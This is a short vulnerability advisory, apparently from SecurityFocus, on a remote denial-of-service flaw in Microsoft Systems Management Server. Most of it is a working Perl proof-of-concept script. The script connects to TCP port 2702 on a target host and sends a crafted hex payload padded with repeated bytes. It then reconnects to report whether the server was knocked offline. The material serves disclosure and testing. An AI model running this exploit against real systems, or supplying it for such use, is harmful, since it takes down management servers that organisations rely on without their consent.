source: https://www.securityfocus.com/bid/10726/info
Reportedly Microsoft Systems Management Server is vulnerable to a remote denial of service vulnerability. This issue is due to a failure of the affected server to handle exceptional conditions.
Successful exploitation of this issue will allow an attacker to trigger a denial of service condition in the affected server. Code execution might be possible but is unlikely and unconfirmed.
#!/usr/bin/perl
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#
# SMS DOS proof of concept and test code
#
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use Socket;
use IO::Socket;
if (@ARGV != 1)
{
print "usage: $0 <host or ip>\n";
exit;
}
$host = shift(@ARGV);
$hexmsg =
converthex("52434830160040005243484558585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858
58585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858");
print "\nCreating socket for connection to: $host\n\n";
my $sock1 = IO::Socket::INET->new (PeerAddr => $host, PeerPort => "(2702)", Proto => "tcp") or die("Could not create socket: $!\n");
$sock1->autoflush(1);
print $sock1 "$hexmsg";
while (<$sock1>)
{
print;
}
print "\nPacket sent to $host (please wait) ...\n";
sleep(2);
print "Verifying status of $host ...\n";
sleep(2);
my $sock2 = IO::Socket::INET->new (PeerAddr => $host, PeerPort => '(2702)', Proto => 'tcp') or die("\nDOS was successful - $host is down ...\n");
print "\nAttempt was not successful. $host is still alive and responding ...\n";
close($sock1);
close($sock2);
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# End main code, start subs
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sub converthex
{
local ($l) = @_;
$l =~ s/([0-9a-f]{1,2})\s*/sprintf("%c",hex($1))/egi;
return $l;
}
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# End code
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